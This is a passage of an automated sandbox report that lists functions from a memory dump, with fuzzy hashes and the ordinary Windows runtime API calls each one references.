                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 5d1827de4624b9fb8ef0b82526024863ccc173882704eeddbfe2f9a1a35ba8d9
                                                                  • Instruction ID: 0137f672959e248dfe6d39d1b9933753d3d0d65db4d26a780347333ad056da6e
                                                                  • Opcode Fuzzy Hash: 5d1827de4624b9fb8ef0b82526024863ccc173882704eeddbfe2f9a1a35ba8d9
                                                                  • Instruction Fuzzy Hash: D3D05E30244300BBEA111F218C06F1A2B98AB41B42F14C4187641950E1C6748414A71D
                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004819EF,?,?,00000008,?,?,0048168F,00000000), ref: 00481C21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: 1ce3f7c843e2891642b35bdd34512f619fc1077f721c53269e7073f711273a41
                                                                  • Instruction ID: 5a892f4f15961b0e84d5de10fa5d90a2ec39bf38c8503333e8f55aa794aaa5a3
                                                                  • Opcode Fuzzy Hash: 1ce3f7c843e2891642b35bdd34512f619fc1077f721c53269e7073f711273a41
                                                                  • Instruction Fuzzy Hash: B7B150315106089FD715DF28C486B697BE4FF45364F258A5AE89ACF3B1C339E982CB44
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0046F66A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: 18a9e7cc1a45633a1217cd930752706a4c352560460fb20df61893726fc46586
                                                                  • Instruction ID: 19e0dc9f3ca3cc817240e0c6b078bcaf476dc4b2abab16fc6ac6937c579e590c
                                                                  • Opcode Fuzzy Hash: 18a9e7cc1a45633a1217cd930752706a4c352560460fb20df61893726fc46586
                                                                  • Instruction Fuzzy Hash: B551A271A006058FEB14CF95E8917AEB7F4FB48304F24897AD441EB360E379A944CB99
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0045B16B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 80216c0cd755f2c51a407c204f7b18fd9492db52c2bc3cac041ef81626d6ebcd
                                                                  • Instruction ID: 6a242caac470bb53ce975700619b56c377ba30736d067e43f12369d9b8d2edc1
                                                                  • Opcode Fuzzy Hash: 80216c0cd755f2c51a407c204f7b18fd9492db52c2bc3cac041ef81626d6ebcd
                                                                  • Instruction Fuzzy Hash: D3F090B4D006188FCB18CB18EC966D933F5F759345F2006BBD915933A0C374A9848FA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gj
                                                                  • API String ID: 0-4203073231
                                                                  • Opcode ID: 080259e3f6936e4343b4aa569fe48de4f961756ff63e89f22ccb473537f740fd
                                                                  • Instruction ID: 7a9e4e3324aeb22375f24fbfe842ca420efb7e6ce87859831d12e57f509ae929
                                                                  • Opcode Fuzzy Hash: 080259e3f6936e4343b4aa569fe48de4f961756ff63e89f22ccb473537f740fd
                                                                  • Instruction Fuzzy Hash: 63C14772A183418FC354CF29D88065AFBE1BFC8708F19892DE998D7311D734E955CB96
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0046F3A5), ref: 0046F9DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: e1739472d23669066fcdbfe590ba8b366727cc7fb4b5d23f58e1a0a5e6bbdb05
                                                                  • Instruction ID: 7ce29bb6cd1bcd28119a055e7990b40b2e9269a21f94cbf8c1560475664007a5
                                                                  • Opcode Fuzzy Hash: e1739472d23669066fcdbfe590ba8b366727cc7fb4b5d23f58e1a0a5e6bbdb05
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcess
                                                                  • String ID:
                                                                  • API String ID: 54951025-0
                                                                  • Opcode ID: b10f8083f07808ef0bec29b1acbe14cbbd16b446a92f0b912ab2297e7ff9a3b7
                                                                  • Instruction ID: 5730316b9d4a3a2e2152e208f2cc4ea10a961fa6c8bc88e485efa4a772b34103
                                                                  • Opcode Fuzzy Hash: b10f8083f07808ef0bec29b1acbe14cbbd16b446a92f0b912ab2297e7ff9a3b7
                                                                  • Instruction Fuzzy Hash: 3DA02230202200CFC380CF30EF0C30C3BE8AA00EC2308083EA808C0030EB3080A0AB08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                  • Instruction ID: 878f4adac3c736777d64f115faf34a4e4f767d80ab5237e6f5c0b0ac7c8d2166
                                                                  • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                  • Instruction Fuzzy Hash: D562F9716047849FCB15CF38C5906BABBE1AF95304F05896EDCDA8B342E738E945CB1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                  • Instruction ID: ef24cb5b11722cd8d2e5d6baa81e13ac338ba058eb1882de21f9a05b7879bf7c
                                                                  • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                  • Instruction Fuzzy Hash: 0962EA7160C3458FCB15DF28C5805B9BBE1BFD5308F18896EE89A8B346E734E945CB1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                  • Instruction ID: 17df2b3f45904c048cf20e3f17b7edf7c3a84e11181653f784f83913b3759e05
                                                                  • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                  • Instruction Fuzzy Hash: F3523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9ca263bfd1244844cf1e36fe2c5035d8efc453b4bcc9383f6a4e0d64178196a
                                                                  • Instruction ID: 7ff9d4412c51f6d95b35fe661ed8653d9ea6bd792b06a793d4c883d6687d91b3
                                                                  • Opcode Fuzzy Hash: a9ca263bfd1244844cf1e36fe2c5035d8efc453b4bcc9383f6a4e0d64178196a
                                                                  • Instruction Fuzzy Hash: 6612D2B06187069FC718CF28C5906B9B7E0FB95308F10492EE996C7781E738A995CB4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c862dd155657611f0b93c12b516a5156ec9095ba1ef1e4fbe8863d208981399
                                                                  • Instruction ID: dee50be7ce31f47f504acc1e4e0e21a3049615ad8567136bd78dbc914f893569
                                                                  • Opcode Fuzzy Hash: 8c862dd155657611f0b93c12b516a5156ec9095ba1ef1e4fbe8863d208981399
                                                                  • Instruction Fuzzy Hash: 44F1AD716083019FC714CF29C5C462ABBE1EF8A319F154A2FF8C597352D638D949CB8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 3f5c5ddf7221a6e59e67f32992bfd1151aacb3315d8d71d92de93ac68e34c439
                                                                  • Instruction ID: fcbe303d0c55861412e817b32dfbeaed0c516673e275650019766e7e36f9c484
                                                                  • Opcode Fuzzy Hash: 3f5c5ddf7221a6e59e67f32992bfd1151aacb3315d8d71d92de93ac68e34c439
                                                                  • Instruction Fuzzy Hash: F5D1A3B16083418FDB14CF29C94475BBBE1BF89308F09456EE8899B342E779E905CB5B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d0fee9fac12b97b2d9ca9ea0b62aebd8dae7749754851f895806f9027cf88b6
                                                                  • Instruction ID: 3f9993bfc128195d833566dabd393bff34806b07be47c232b9ca8c99474c004d
                                                                  • Opcode Fuzzy Hash: 1d0fee9fac12b97b2d9ca9ea0b62aebd8dae7749754851f895806f9027cf88b6
                                                                  • Instruction Fuzzy Hash: F9E13B755083948FC305CF29D89086ABFF0AF9A300F46496FF9D497352C239EA19DB96
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                  • Instruction ID: 6550f121e71cc2a654005b3ca7611374587fa62463a3ac8c2aaad6da825d0821
                                                                  • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                  • Instruction Fuzzy Hash: 1F9147B02003458BDF24EE64D895BFB77D5EB91308F10092FE99687382FA6C9599C35B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                  • Instruction ID: c42cef1794c866ba8de2fbf72c4305eea336a0d2f6a720e33f1bed86fb0ce2a6
                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                  • Instruction Fuzzy Hash: 1E8120713043455FDF24DE59C991BBE37D4ABD1308F00492FEA8687282EE6C9985875B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3a5c7f1bc03812b70392c2531c53328fdd13f99ab9873e3fa79a4f9f1910e47
                                                                  • Instruction ID: f80192cd011010dd7441ab21911ba3de77176ce937c9334e437fcccae45cf447
                                                                  • Opcode Fuzzy Hash: c3a5c7f1bc03812b70392c2531c53328fdd13f99ab9873e3fa79a4f9f1910e47
                                                                  • Instruction Fuzzy Hash: D961AA31A00F0856EA349A6868957FF2394EB41344F14C95FE84EDF393D6DDEC428A4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                  • Instruction ID: 6fe7a98edcf80f0aad8f49ef92293c3f85daeaedea4d3db8a8e9b6f95df21cc4
                                                                  • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                  • Instruction Fuzzy Hash: 45512460600F8857DB3456788556BFF23959B42305F58C81FE98EDF382C68DAE0683AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 733deccb827c242de999ec270e6ae74952feee772e56c16d4c49c3139e971eae
                                                                  • Instruction ID: 0cfc55f76849aa7112ef136a9bad690f6445649e54893d8b242dd68e1d0341b0
                                                                  • Opcode Fuzzy Hash: 733deccb827c242de999ec270e6ae74952feee772e56c16d4c49c3139e971eae
                                                                  • Instruction Fuzzy Hash: 2451F4315093D58FD702DF35C14046EBFE0AE9A719F4909AEE8D95B243C224DA4ECB67
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa8cfbe09885d12bdc6a97d2ab5e9d7b621243a521c157524d54d1957109653
                                                                  • Instruction ID: 270ffe74f10d21e13513a0688f14b859bc49d02343fdcad84926fcc51baa42dc
                                                                  • Opcode Fuzzy Hash: 4aa8cfbe09885d12bdc6a97d2ab5e9d7b621243a521c157524d54d1957109653
